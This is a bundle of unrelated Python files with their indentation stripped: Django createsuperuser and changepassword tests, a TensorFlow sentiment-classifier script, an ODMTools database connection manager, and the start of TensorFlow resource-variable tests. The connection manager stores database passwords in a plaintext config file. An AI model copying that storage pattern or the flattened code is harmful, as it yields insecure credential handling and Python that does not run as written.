call_command('changepassword', username='J\xfalia', stdout=self.stdout)
class MultiDBChangepasswordManagementCommandTestCase(TestCase):
multi_db = True
@mock.patch.object(changepassword.Command, '_get_pass', return_value='not qwerty')
def test_that_changepassword_command_with_database_option_uses_given_db(self, mock_get_pass):
"""
changepassword --database should operate on the specified DB.
"""
user = User.objects.db_manager('other').create_user(username='joe', password='qwerty')
self.assertTrue(user.check_password('qwerty'))
out = StringIO()
call_command('changepassword', username='joe', database='other', stdout=out)
command_output = out.getvalue().strip()
self.assertEqual(
command_output,
"Changing password for user 'joe'\nPassword changed successfully for user 'joe'"
)
self.assertTrue(User.objects.using('other').get(username="joe").check_password('not qwerty'))
@override_settings(
SILENCED_SYSTEM_CHECKS=['fields.W342'], # ForeignKey(unique=True)
AUTH_PASSWORD_VALIDATORS=[{'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator'}],
)
class CreatesuperuserManagementCommandTestCase(TestCase):
def test_basic_usage(self):
"Check the operation of the createsuperuser management command"
# We can use the management command to create a superuser
new_io = StringIO()
call_command(
"createsuperuser",
interactive=False,
username="joe",
email="[email protected]",
stdout=new_io
)
command_output = new_io.getvalue().strip()
self.assertEqual(command_output, 'Superuser created successfully.')
u = User.objects.get(username="joe")
self.assertEqual(u.email, '[email protected]')
# created password should be unusable
self.assertFalse(u.has_usable_password())
@mock_inputs({
'password': "nopasswd",
'u\u017eivatel': 'foo', # username (cz)
'email': '[email protected]'})
def test_non_ascii_verbose_name(self):
username_field = User._meta.get_field('username')
old_verbose_name = username_field.verbose_name
username_field.verbose_name = _('u\u017eivatel')
new_io = StringIO()
try:
call_command(
"createsuperuser",
interactive=True,
stdout=new_io,
stdin=MockTTY(),
)
finally:
username_field.verbose_name = old_verbose_name
command_output = new_io.getvalue().strip()
self.assertEqual(command_output, 'Superuser created successfully.')
def test_verbosity_zero(self):
# We can suppress output on the management command
new_io = StringIO()
call_command(
"createsuperuser",
interactive=False,
username="joe2",
email="[email protected]",
verbosity=0,
stdout=new_io
)
command_output = new_io.getvalue().strip()
self.assertEqual(command_output, '')
u = User.objects.get(username="joe2")
self.assertEqual(u.email, '[email protected]')
self.assertFalse(u.has_usable_password())
def test_email_in_username(self):
new_io = StringIO()
call_command(
"createsuperuser",
interactive=False,
username="[email protected]",
email="[email protected]",
stdout=new_io
)
u = User._default_manager.get(username="[email protected]")
self.assertEqual(u.email, '[email protected]')
self.assertFalse(u.has_usable_password())
@override_settings(AUTH_USER_MODEL='auth_tests.CustomUser')
def test_swappable_user(self):
"A superuser can be created when a custom user model is in use"
# We can use the management command to create a superuser
# We skip validation because the temporary substitution of the
# swappable User model messes with validation.
new_io = StringIO()
call_command(
"createsuperuser",
interactive=False,
email="[email protected]",
date_of_birth="1976-04-01",
stdout=new_io,
)
command_output = new_io.getvalue().strip()
self.assertEqual(command_output, 'Superuser created successfully.')
u = CustomUser._default_manager.get(email="[email protected]")
self.assertEqual(u.date_of_birth, date(1976, 4, 1))
# created password should be unusable
self.assertFalse(u.has_usable_password())
@override_settings(AUTH_USER_MODEL='auth_tests.CustomUser')
def test_swappable_user_missing_required_field(self):
"A Custom superuser won't be created when a required field isn't provided"
# We can use the management command to create a superuser
# We skip validation because the temporary substitution of the
# swappable User model messes with validation.
new_io = StringIO()
with self.assertRaises(CommandError):
call_command(
"createsuperuser",
interactive=False,
username="[email protected]",
stdout=new_io,
stderr=new_io,
)
self.assertEqual(CustomUser._default_manager.count(), 0)
@override_settings(
AUTH_USER_MODEL='auth_tests.CustomUserNonUniqueUsername',
AUTHENTICATION_BACKENDS=['my.custom.backend'],
)
def test_swappable_user_username_non_unique(self):
@mock_inputs({
'username': 'joe',
'password': 'nopasswd',
})
def createsuperuser():
new_io = StringIO()
call_command(
"createsuperuser",
interactive=True,
email="[email protected]",
stdout=new_io,
stdin=MockTTY(),
)
command_output = new_io.getvalue().strip()
self.assertEqual(command_output, 'Superuser created successfully.')
for i in range(2):
createsuperuser()
users = CustomUserNonUniqueUsername.objects.filter(username="joe")
self.assertEqual(users.count(), 2)
def test_skip_if_not_in_TTY(self):
"""
If the command is not called from a TTY, it should be skipped and a
message should be displayed (#7423).
"""
class FakeStdin:
"""A fake stdin object that has isatty() return False."""
def isatty(self):
return False
out = StringIO()
call_command(
"createsuperuser",
stdin=FakeStdin(),
stdout=out,
interactive=True,
)
self.assertEqual(User._default_manager.count(), 0)
self.assertIn("Superuser creation skipped", out.getvalue())
def test_passing_stdin(self):
"""
You can pass a stdin object as an option and it should be
available on self.stdin.
If no such option is passed, it defaults to sys.stdin.
"""
sentinel = object()
command = createsuperuser.Command()
call_command(
command,
stdin=sentinel,
stdout=StringIO(),
stderr=StringIO(),
interactive=False,
verbosity=0,
username='janet',
email='[email protected]',
)
self.assertIs(command.stdin, sentinel)
command = createsuperuser.Command()
call_command(
command,
stdout=StringIO(),
stderr=StringIO(),
interactive=False,
verbosity=0,
username='joe',
email='[email protected]',
)
self.assertIs(command.stdin, sys.stdin)
@override_settings(AUTH_USER_MODEL='auth_tests.CustomUserWithFK')
def test_fields_with_fk(self):
new_io = StringIO()
group = Group.objects.create(name='mygroup')
email = Email.objects.create(email='[email protected]')
call_command(
'createsuperuser',
interactive=False,
username=email.pk,
email=email.email,
group=group.pk,
stdout=new_io,
)
command_output = new_io.getvalue().strip()
self.assertEqual(command_output, 'Superuser created successfully.')
u = CustomUserWithFK._default_manager.get(email=email)
self.assertEqual(u.username, email)
self.assertEqual(u.group, group)
non_existent_email = '[email protected]'
msg = 'email instance with email %r does not exist.' % non_existent_email
with self.assertRaisesMessage(CommandError, msg):
call_command(
'createsuperuser',
interactive=False,
username=email.pk,
email=non_existent_email,
stdout=new_io,
)
@override_settings(AUTH_USER_MODEL='auth_tests.CustomUserWithFK')
def test_fields_with_fk_interactive(self):
new_io = StringIO()
group = Group.objects.create(name='mygroup')
email = Email.objects.create(email='[email protected]')
@mock_inputs({
'password': 'nopasswd',
'username (email.id)': email.pk,
'email (email.email)': email.email,
'group (group.id)': group.pk,
})
def test(self):
call_command(
'createsuperuser',
interactive=True,
stdout=new_io,
stdin=MockTTY(),
)
command_output = new_io.getvalue().strip()
self.assertEqual(command_output, 'Superuser created successfully.')
u = CustomUserWithFK._default_manager.get(email=email)
self.assertEqual(u.username, email)
self.assertEqual(u.group, group)
test(self)
def test_password_validation(self):
"""
Creation should fail if the password fails validation.
"""
new_io = StringIO()
# Returns '1234567890' the first two times it is called, then
# 'password' subsequently.
def bad_then_good_password(index=[0]):
index[0] += 1
if index[0] <= 2:
return '1234567890'
return 'password'
@mock_inputs({
'password': bad_then_good_password,
'username': 'joe1234567890',
})
def test(self):
call_command(
"createsuperuser",
interactive=True,
stdin=MockTTY(),
stdout=new_io,
stderr=new_io,
)
self.assertEqual(
new_io.getvalue().strip(),
"This password is entirely numeric.\n"
"Superuser created successfully."
)
test(self)
def test_validation_mismatched_passwords(self):
"""
Creation should fail if the user enters mismatched passwords.
"""
new_io = StringIO()
# The first two passwords do not match, but the second two do match and
# are valid.
entered_passwords = ["password", "not password", "password2", "password2"]
def mismatched_passwords_then_matched():
return entered_passwords.pop(0)
@mock_inputs({
'password': mismatched_passwords_then_matched,
'username': 'joe1234567890',
})
def test(self):
call_command(
"createsuperuser",
interactive=True,
stdin=MockTTY(),
stdout=new_io,
stderr=new_io,
)
self.assertEqual(
new_io.getvalue().strip(),
"Error: Your passwords didn't match.\n"
"Superuser created successfully."
)
test(self)
def test_validation_blank_password_entered(self):
"""
Creation should fail if the user enters blank passwords.
"""
new_io = StringIO()
# The first two passwords are empty strings, but the second two are
# valid.
entered_passwords = ["", "", "password2", "password2"]
def blank_passwords_then_valid():
return entered_passwords.pop(0)
@mock_inputs({
'password': blank_passwords_then_valid,
'username': 'joe1234567890',
})
def test(self):
call_command(
"createsuperuser",
interactive=True,
stdin=MockTTY(),
stdout=new_io,
stderr=new_io,
)
self.assertEqual(
new_io.getvalue().strip(),
"Error: Blank passwords aren't allowed.\n"
"Superuser created successfully."
)
test(self)
class MultiDBCreatesuperuserTestCase(TestCase):
multi_db = True
def test_createsuperuser_command_with_database_option(self):
"""
changepassword --database should operate on the specified DB.
"""
new_io = StringIO()
call_command(
'createsuperuser',
interactive=False,
username='joe',
email='[email protected]',
database='other',
stdout=new_io,
)
command_output = new_io.getvalue().strip()
self.assertEqual(command_output, 'Superuser created successfully.')
user = User.objects.using('other').get(username='joe')
self.assertEqual(user.email, '[email protected]')
class CreatePermissionsTests(TestCase):
def setUp(self):
self._original_permissions = Permission._meta.permissions[:]
self._original_default_permissions = Permission._meta.default_permissions
self.app_config = apps.get_app_config('auth')
def tearDown(self):
Permission._meta.permissions = self._original_permissions
Permission._meta.default_permissions = self._original_default_permissions
ContentType.objects.clear_cache()
def test_default_permissions(self):
permission_content_type = ContentType.objects.get_by_natural_key('auth', 'permission')
Permission._meta.permissions = [
('my_custom_permission', 'Some permission'),
]
create_permissions(self.app_config, verbosity=0)
# add/change/delete permission by default + custom permission
self.assertEqual(Permission.objects.filter(
content_type=permission_content_type,
).count(), 4)
Permission.objects.filter(content_type=permission_content_type).delete()
Permission._meta.default_permissions = []
create_permissions(self.app_config, verbosity=0)
# custom permission only since default permissions is empty
self.assertEqual(Permission.objects.filter(
content_type=permission_content_type,
).count(), 1)
def test_unavailable_models(self):
"""
#24075 - Permissions shouldn't be created or deleted if the ContentType
or Permission models aren't available.
"""
state = migrations.state.ProjectState()
# Unavailable contenttypes.ContentType
with self.assertNumQueries(0):
create_permissions(self.app_config, verbosity=0, apps=state.apps)
# Unavailable auth.Permission
state = migrations.state.ProjectState(real_apps=['contenttypes'])
with self.assertNumQueries(0):
create_permissions(self.app_config, verbosity=0, apps=state.apps)
|
|
from __future__ import print_function
import tensorflow as tf
import pandas as pd
import numpy as np
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.feature_extraction.text import TfidfVectorizer, TfidfTransformer
import math
import itertools
from collections import Counter
from sklearn.metrics import auc, roc_auc_score
import matplotlib.pyplot as plt
MAX_FEAT = 7000
NUM_CLASSES = 1
LEARNING_RATE = 2
TRAIN_STEPS = 150
BATCH_SIZE = 1000
TEMP_SIZE = 5000
NGRAM = 3
BETA_INIT = 1e-5
BETA_STEPS = 1
MAX_FEAT *= NGRAM
train_data = pd.read_csv("Clean_train.csv", quoting=3, header=0)
validation_data = pd.read_csv("Clean_validation.csv", quoting=3, header=0)
# Copy the results to a pandas dataframe with an "id" column and
# a "sentiment" column
test_data = pd.read_csv("Clean_test.csv", quoting=3, header=0)
TEST_SIZE = len(test_data['sentiment'])
TRAIN_SIZE = len(train_data['sentiment'])
VALIDATION_SIZE = len(validation_data['sentiment'])
#print(validation_data)
# vectorizer = CountVectorizer(analyzer = "word", \
# tokenizer = None, \
# preprocessor = None, \
# stop_words = None, \
# ngram_range=(1, NGRAM), \
# max_features = MAX_FEAT)
vectorizer = TfidfVectorizer(analyzer = "word", \
tokenizer = None, \
preprocessor = None, \
stop_words = None, \
ngram_range=(1, NGRAM), \
max_features = MAX_FEAT)
#transformer = TfidfTransformer(smooth_idf=False)
x_train_raw = vectorizer.fit_transform(train_data['reviews'])
#x_train_raw = transformer.fit_transform(x_train_raw)
x_train = x_train_raw.toarray()
# train_data['asentiment'] = 1 - train_data['sentiment']
y_train = np.reshape(train_data['sentiment'].values, (TRAIN_SIZE, NUM_CLASSES))
# y_train = np.reshape(train_data[['sentiment', 'asentiment']].values, (TRAIN_SIZE, NUM_CLASSES))
x_validation_raw = vectorizer.transform(validation_data['reviews'])
#x_validation_raw = transformer.fit_transform(x_validation_raw)
x_validation = x_validation_raw.toarray()
# validation_data['asentiment'] = 1 - validation_data['sentiment']
y_validation = np.reshape(validation_data['sentiment'].values, (VALIDATION_SIZE, NUM_CLASSES))
# y_validation = np.reshape(validation_data[['sentiment', 'asentiment']].values, (validation_SIZE, NUM_CLASSES))
# print(test_data['id'].shape)
x_test_raw = vectorizer.transform(test_data['reviews'])
x_test = x_test_raw.toarray()
y_test = np.reshape(test_data['sentiment'].values, (TEST_SIZE, NUM_CLASSES))
vocab = vectorizer.get_feature_names()
print(x_train.shape, y_train.shape)
print(x_validation.shape, y_validation.shape)
sess = None
def ResetSession():
tf.reset_default_graph()
global sess
if sess is not None: sess.close()
sess = tf.InteractiveSession()
ResetSession()
x = tf.placeholder(tf.float32, [None, MAX_FEAT], name='x')
y = tf.placeholder(tf.float32, [None, NUM_CLASSES], name='y_label')
beta = tf.placeholder(tf.float32, name='beta')
def weight_variable(inputs, outputs, name):
# Random small values
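# Truncated-normal init with stddev 1/sqrt(fan_in) keeps the initial
# pre-activations roughly unit-scale regardless of the number of input features.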
initial = tf.truncated_normal(shape=[inputs, outputs], stddev=1.0 / math.sqrt(float(inputs)))
return tf.Variable(initial, name=name)
def bias_variable(shape, name):
initial = tf.constant(0.0, shape=[shape])
return tf.Variable(initial, name=name)
def batch_iter(data, batch_size, num_epochs, shuffle=True):
# Generates a batch iterator for a dataset.
data = np.array(data)
data_size = len(data)
num_batches_per_epoch = int((len(data)-1)/batch_size) + 1
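# Ceiling division: the final batch of each epoch may be smaller than batch_size.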
for epoch in range(num_epochs):
# Shuffle the data at each epoch
if shuffle:
shuffle_indices = np.random.permutation(np.arange(data_size))
shuffled_data = data[shuffle_indices]
else:
shuffled_data = data
for batch_num in range(num_batches_per_epoch):
start_index = batch_num * batch_size
end_index = min((batch_num + 1) * batch_size, data_size)
yield shuffled_data[start_index:end_index]
W = weight_variable(MAX_FEAT, NUM_CLASSES, 'weights')
b = bias_variable(NUM_CLASSES, name='bias')
h = tf.matmul(x, W) + b
h_sig = tf.sigmoid(h)
# loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=h, labels=y))
regularizer = tf.nn.l2_loss(W)
loss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=h, labels=y) + beta * regularizer)
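# Objective: mean sigmoid cross-entropy plus an L2 weight penalty; tf.nn.l2_loss
# already includes the 1/2 factor, so the penalty is beta * sum(W**2) / 2.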
# train_step = tf.train.GradientDescentOptimizer(LEARNING_RATE).minimize(loss)
train_step = tf.train.AdamOptimizer(4e-3).minimize(loss)
h_class = tf.cast((h_sig > 0.5), tf.float32)
prediction = tf.equal((h_sig > 0.5), tf.cast(y, tf.bool))
accuracy = tf.reduce_mean(tf.cast(prediction, tf.float32))
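# Predictions threshold the sigmoid output at 0.5; accuracy is the fraction of
# label entries that the thresholded output matches.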
init_g = tf.global_variables_initializer()
#i_lst = []
# j_beta = BETA_INIT
# NOTE: starting at 0, j_beta stays 0 after "j_beta *= mult"; start from a small
# positive value (e.g. BETA_INIT) to actually sweep the regularization strength.
j_beta = 0
mult = 2
j_tr_loss = []
j_vl_loss = []
j_beta_lst = []
for j in range(BETA_STEPS):
tr_loss_lst = []
ts_loss_lst = []
sess.run(init_g)
i = 0
avg_loss = 0
batches = batch_iter(list(zip(x_train, y_train)), BATCH_SIZE, TRAIN_STEPS)  # materialize the zip so batch_iter can take len() and index it
for batch in batches:
x_batch, y_batch = zip(*batch)
#i_lst.append(i)
i_loss, _ = sess.run([loss, train_step], feed_dict={x: x_batch, y: y_batch, beta: j_beta})
avg_loss += i_loss
if i % 10 == 0:
# print(int((i * 10) / TRAIN_STEPS), i_loss)
tr_loss_lst.append(avg_loss/10)
avg_loss = 0
ts_loss_lst.append(sess.run(loss, feed_dict={x: x_validation, y: y_validation, beta: 0}))
if i % 100 == 0:
print("Train accuracy %f" % sess.run(accuracy, feed_dict={x: x_train, y: y_train}))
# sess.run(init_l)
exh, exy = sess.run([h_sig, y], feed_dict={x: x_batch, y: y_batch})
print("Train AUC %f" % roc_auc_score(exy[:,0],exh[:,0]))
i += 1
print("%d, beta %f" % (j, j_beta))
j_beta_lst.append(j_beta)
print("Train accuracy %f" % sess.run(accuracy, feed_dict={x: x_train, y: y_train}))
exh, exy, j_loss = sess.run([h_sig, y, loss], feed_dict={x: x_train, y: y_train, beta: 0})
j_tr_loss.append(j_loss)
# print(exh)
print("Train AUC %f" % roc_auc_score(exy[:,0],exh[:,0]))
print("Validation accuracy %f" % sess.run(accuracy, feed_dict={x: x_validation, y: y_validation}))
exh, exy, j_loss = sess.run([h_sig, y, loss], feed_dict={x: x_validation, y: y_validation, beta: 0})
j_vl_loss.append(j_loss)
print("Validation AUC %f" % roc_auc_score(exy[:,0],exh[:,0]))
j_beta *= mult
# print(x_test)
# result, _ = sess.run([h_sig, h], feed_dict={x: x_test})
print("Test accuracy %f" % sess.run(accuracy, feed_dict={x: x_test, y: y_test}))
exh, exy = sess.run([h_sig, y], feed_dict={x: x_test, y: y_test, beta: 0})
print("Test AUC %f" % roc_auc_score(exy[:,0],exh[:,0]))
# print(result)
# output = pd.DataFrame( data={"sentiment":result[:,0]} )
# Use pandas to write the comma-separated output file
# output.to_csv( "result.csv", index=False, quoting=3 )
# Plot loss and validation accuracy
plt.plot(tr_loss_lst, 'b')
plt.plot(ts_loss_lst, 'g')
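# tr_loss_lst/ts_loss_lst are rebuilt inside the beta loop, so these curves show
# the training (blue) and validation (green) loss for the last beta value only.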
# Plot train and validation loss vs regularization parameter
# plt.plot(j_beta_lst, j_tr_loss, 'b')
# plt.plot(j_beta_lst, j_vl_loss, 'g')
plt.show()
|
|
import logging
import os
import sys
import urllib
from sqlalchemy.exc import SQLAlchemyError#OperationalError, DBAPIError
#from odmtools.common.logger import LoggerTool
from series_service import SeriesService
from cv_service import CVService
from edit_service import EditService
from odmtools.controller import EditTools
from export_service import ExportService
from odmtools.lib.Appdirs.appdirs import user_config_dir
from odmtools.odmdata.session_factory import SessionFactory
#tool = LoggerTool()
#logger = tool.setupLogger(__name__, __name__ + '.log', 'w', logging.DEBUG)
logger = logging.getLogger(__name__)  # fallback logger so the `logger` calls below resolve
class ServiceManager():
def __init__(self, debug=False):
self.debug = debug
f = self._get_file('r')
self._conn_dicts = []
self.version = 0
self._connection_format = "%s+%s://%s:%s@%s/%s"
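# SQLAlchemy URL template: engine+driver://user:password@address/db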
# Read all lines (connections) in the connection.cfg file
while True:
line = f.readline()
if not line:
break
else:
line = line.split()
#logger.debug(line)
if len(line) >= 5:
line_dict = {}
line_dict['engine'] = line[0]
line_dict['user'] = line[1]
line_dict['password'] = line[2]
line_dict['address'] = line[3]
line_dict['db'] = line[4]
self._conn_dicts.append(line_dict)
if len(self._conn_dicts) != 0:
# The current connection defaults to the most recent (i.e. the last written to the file)
self._current_conn_dict = self._conn_dicts[-1]
else:
self._current_conn_dict = None
f.close()
def get_all_conn_dicts(self):
return self._conn_dicts
def is_valid_connection(self):
if self._current_conn_dict:
conn_string = self._build_connection_string(self._current_conn_dict)
logger.debug("Conn_string: %s" % conn_string)
try:
if self.testEngine(conn_string):
return self.get_current_conn_dict()
except Exception as e:
logger.fatal("The previous database for some reason isn't accessible, please enter a new connection %s" % e.message)
return None
return None
def get_current_conn_dict(self):
return self._current_conn_dict
def set_current_conn_dict(self, conn_dict):
self._current_conn_dict = conn_dict
def add_connection(self, conn_dict):
"""conn_dict must be a dictionary with keys: engine, user, password, address, db"""
# remove earlier connections that are identical to this one
self.delete_connection(conn_dict)
if self.test_connection(conn_dict):
# write changes to connection file
self._conn_dicts.append(conn_dict)
self._current_conn_dict = self._conn_dicts[-1]
self._save_connections()
return True
else:
logger.error("Unable to save connection due to invalid connection to database")
return False
@classmethod
def testEngine(cls, connection_string):
s = SessionFactory(connection_string, echo=False)
if 'mssql' in connection_string:
s.ms_test_Session().execute("Select top 1 VariableCode From Variables")
elif 'mysql' in connection_string:
s.my_test_Session().execute('Select "VariableCode" From Variables Limit 1')
elif 'postgresql' in connection_string:
#s.psql_test_Session().execute('Select "VariableCode" From "ODM2"."Variables" Limit 1')
s.psql_test_Session().execute('Select "VariableCode" From "Variables" Limit 1')
return True
def test_connection(self, conn_dict):
try:
conn_string = self._build_connection_string(conn_dict)
if self.testEngine(conn_string) and self.get_db_version(conn_string) == '1.1.1':
return True
except SQLAlchemyError as e:
logger.error("SQLAlchemy Error: %s" % e.message)
raise e
except Exception as e:
logger.error("Error: %s" % e)
raise e
return False
def delete_connection(self, conn_dict):
self._conn_dicts[:] = [x for x in self._conn_dicts if x != conn_dict]
# Create and return services based on the currently active connection
def get_db_version_dict(self, conn_dict):
conn_string = self._build_connection_string(conn_dict)
self.get_db_version(conn_string)
def get_db_version(self, conn_string):
if isinstance(conn_string, dict):
conn_string = self._build_connection_string(conn_string)
service = SeriesService(conn_string)
#if not self.version:
try:
self.version = service.get_db_version()
except Exception as e:
logger.error("Exception: %s" % e.message)
return None
return self.version
def get_series_service(self, conn_dict=""):
conn_string = ""
if conn_dict:
conn_string = self._build_connection_string(conn_dict)
self._current_conn_dict = conn_dict
else:
conn_string = self._build_connection_string(self._current_conn_dict)
return SeriesService(conn_string, self.debug)
def get_cv_service(self):
conn_string = self._build_connection_string(self._current_conn_dict)
return CVService(conn_string, self.debug)
def get_edit_service(self, series_id, connection):
return EditService(series_id, connection=connection, debug=self.debug)
def get_record_service(self, script, series_id, connection):
return EditTools(self, script, self.get_edit_service(series_id, connection),
self._build_connection_string(self.is_valid_connection()))
def get_export_service(self):
return ExportService(self.get_series_service())
## ###################
# private methods
## ###################
def _get_file(self, mode):
#fn = util.resource_path('connection.config')
fn = os.path.join(user_config_dir("ODMTools", "UCHIC"), 'connection.config')
config_file = None
try:
if os.path.exists(fn):
config_file = open(fn, mode)
else:
os.makedirs(user_config_dir("ODMTools", "UCHIC"))
open(fn, 'w').close()
config_file = open(fn, mode)
except:
open(fn, 'w').close()
config_file = open(fn, mode)
return config_file
def _build_connection_string(self, conn_dict):
driver = ""
if conn_dict['engine'] == 'mssql' and sys.platform != 'win32':
driver = "pyodbc"
quoted = urllib.quote_plus('DRIVER={FreeTDS};DSN=%s;UID=%s;PWD=%s;' % (conn_dict['address'], conn_dict['user'], conn_dict['password']))
conn_string = 'mssql+pyodbc:///?odbc_connect={}'.format(quoted)
else:
if conn_dict['engine'] == 'mssql':
driver = "pyodbc"
elif conn_dict['engine'] == 'mysql':
driver = "pymysql"
elif conn_dict['engine'] == 'postgresql':
driver = "psycopg2"
else:
driver = "None"
conn_string = self._connection_format % (
conn_dict['engine'], driver, conn_dict['user'], conn_dict['password'], conn_dict['address'],
conn_dict['db'])
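# e.g. 'mysql+pymysql://user:password@localhost/ODM' (illustrative values only)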
return conn_string
def _save_connections(self):
f = self._get_file('w')
for conn in self._conn_dicts:
f.write("%s %s %s %s %s\n" % (conn['engine'], conn['user'], conn['password'], conn['address'], conn['db']))
f.close()
|
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.ops.resource_variable_ops."""
import copy
import gc
import os
import pickle
import re
from absl.testing import parameterized
import numpy as np
from tensorflow.core.framework import full_type_pb2
from tensorflow.core.framework import tensor_pb2
from tensorflow.python.compat import compat as forward_compat
from tensorflow.python.eager import backprop
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import cpp_shape_inference_pb2
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import indexed_slices
from tensorflow.python.framework import memory_checker
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import tensor_util
from tensorflow.python.framework import test_ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import custom_gradient
from tensorflow.python.ops import gradients_impl
from tensorflow.python.ops import handle_data_util
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import list_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
from tensorflow.python.training import momentum
from tensorflow.python.training import saver
from tensorflow.python.training import training_util
from tensorflow.python.util import compat
def _eager_safe_var_handle_op(*args, **kwargs):
# When running in eager mode the `shared_name` should be set to the
# `anonymous_name` to avoid spurious sharing issues. The runtime generates a
# unique name on our behalf when the reserved `anonymous_name` is used as the
# `shared_name`.
if context.executing_eagerly() and "shared_name" not in kwargs:
kwargs["shared_name"] = context.anonymous_name()
return resource_variable_ops.var_handle_op(*args, **kwargs)
@test_util.with_eager_op_as_function
@test_util.with_control_flow_v2
class ResourceVariableOpsTest(test_util.TensorFlowTestCase,
parameterized.TestCase):
def tearDown(self):
gc.collect()
# This will only contain uncollectable garbage, i.e. reference cycles
# involving objects with __del__ defined.
self.assertEmpty(gc.garbage)
super(ResourceVariableOpsTest, self).tearDown()
@test_util.run_deprecated_v1
def testHandleDtypeShapeMatch(self):
with self.cached_session():
handle = _eager_safe_var_handle_op(dtype=dtypes.int32, shape=[])
with self.assertRaises(ValueError):
resource_variable_ops.assign_variable_op(
handle, constant_op.constant(0.0, dtype=dtypes.float32)).run()
with self.assertRaises(ValueError):
resource_variable_ops.assign_variable_op(handle,
constant_op.constant(
[0],
dtype=dtypes.int32)).run()
resource_variable_ops.assign_variable_op(handle,
constant_op.constant(
0,
dtype=dtypes.int32)).run()
@test_util.run_gpu_only
def testGPUInt64(self):
with context.eager_mode(), context.device("gpu:0"):
v = resource_variable_ops.ResourceVariable(1, dtype=dtypes.int64)
self.assertAllEqual(1, v.numpy())
@test_util.run_gpu_only
def testGPUBfloat16(self):
with context.eager_mode(), ops.device("gpu:0"):
v = resource_variable_ops.ResourceVariable(1, dtype=dtypes.bfloat16)
self.assertEqual("/job:localhost/replica:0/task:0/device:GPU:0",
v.device)
self.assertAllEqual(1, v.numpy())
def testEagerNameNotIdentity(self):
with context.eager_mode():
v0 = resource_variable_ops.ResourceVariable(1.0, name="a")
v1 = resource_variable_ops.ResourceVariable(2.0, name="a")
self.assertAllEqual(v0.numpy(), 1.0)
self.assertAllEqual(v1.numpy(), 2.0)
def testEagerNameNotNeeded(self):
with context.eager_mode():
v0 = resource_variable_ops.ResourceVariable(1.0)
self.assertAllEqual(v0.numpy(), 1.0)
def testReadVariableDtypeMismatchEager(self):
with context.eager_mode():
handle = _eager_safe_var_handle_op(
dtype=dtypes.int32, shape=[1], name="foo")
resource_variable_ops.assign_variable_op(handle, 1)
# The error message varies depending on whether it is being raised
# by the kernel or shape inference. The shape inference code path can
# be reached when running in eager op as function mode where each op
# is wrapped in a tf.function.
with self.assertRaisesRegex(
errors.InvalidArgumentError,
r"Trying to read variable with wrong dtype. "
r"Expected (float|int32) got (int32|float)"):
_ = resource_variable_ops.read_variable_op(handle, dtype=dtypes.float32)
def testEagerInitializedValue(self):
with context.eager_mode():
variable = resource_variable_ops.ResourceVariable(1.0, name="eager-init")
self.assertAllEqual(variable.numpy(), 1.0)
self.assertAllEqual(variable.initialized_value().numpy(), 1.0)
def testInitializeVariableUsingInitializedValue(self):
var1 = resource_variable_ops.ResourceVariable(1.0, name="var1")
var2 = resource_variable_ops.ResourceVariable(var1.initialized_value(),
name="var2")
self.assertAllEqual(var2.initialized_value(), 1.0)
def testEagerBool(self):
with context.eager_mode():
v = resource_variable_ops.ResourceVariable(False, name="bool_test")
self.assertAllEqual(bool(v), False)
def testEagerDeepCopy(self):
with context.eager_mode():
init_value = np.ones((4, 4, 4))
variable = resource_variable_ops.ResourceVariable(
init_value,
name="init",
synchronization=variables.VariableSynchronization.ON_READ,
aggregation=variables.VariableAggregation.SUM)
copied_variable = copy.deepcopy(variable)
self.assertEqual(variable.name, copied_variable.name)
self.assertEqual(variable.shape, copied_variable.shape)
self.assertEqual(variable.device, copied_variable.device)
self.assertEqual(variable.synchronization,
copied_variable.synchronization)
self.assertEqual(variable.aggregation, copied_variable.aggregation)
# The copied variable should have the same value as the original.
self.assertAllEqual(variable.numpy(), copied_variable.numpy())
# Updates to the copy should not be reflected in the original.
copied_variable.assign(4 * np.ones((4, 4, 4)))
self.assertNotAllEqual(variable.numpy(), copied_variable.numpy())
@test_util.run_deprecated_v1
def testGraphDeepCopy(self):
with self.cached_session():
init_value = np.ones((4, 4, 4))
variable = resource_variable_ops.ResourceVariable(init_value,
name="init")
with self.assertRaises(NotImplementedError):
copy.deepcopy(variable)
@test_util.run_in_graph_and_eager_modes
def testStridedSliceAssign(self):
v = resource_variable_ops.ResourceVariable([1.0, 2.0])
self.evaluate(variables.global_variables_initializer())
self.evaluate(v[0].assign(2.0))
self.assertAllEqual(self.evaluate(v), [2.0, 2.0])
@test_util.run_in_graph_and_eager_modes
def testVariableShape(self):
v = resource_variable_ops.ResourceVariable([1., 1.])
vshape = resource_variable_ops.variable_shape(v.handle)
self.assertAllEqual(
tensor_util.constant_value(vshape),
[2])
if not context.executing_eagerly():
self.assertEqual("Const", vshape.op.type)
@test_util.run_deprecated_v1
def testDifferentAssignGraph(self):
with ops.Graph().as_default():
v = resource_variable_ops.ResourceVariable(1.0)
ops.reset_default_graph()
v.assign(2.0)  # Note: this fails if convert_to_tensor is run on a graph
# other than the variable's graph.
@test_util.run_deprecated_v1
def testFetchHandle(self):
with self.cached_session():
handle = _eager_safe_var_handle_op(
dtype=dtypes.int32, shape=[1], name="foo")
self.assertNotEmpty(self.evaluate(handle))
@test_util.run_deprecated_v1
def testCachedValueReadBeforeWrite(self):
with self.cached_session() as sess:
v = resource_variable_ops.ResourceVariable(0.0, caching_device="cpu:0")
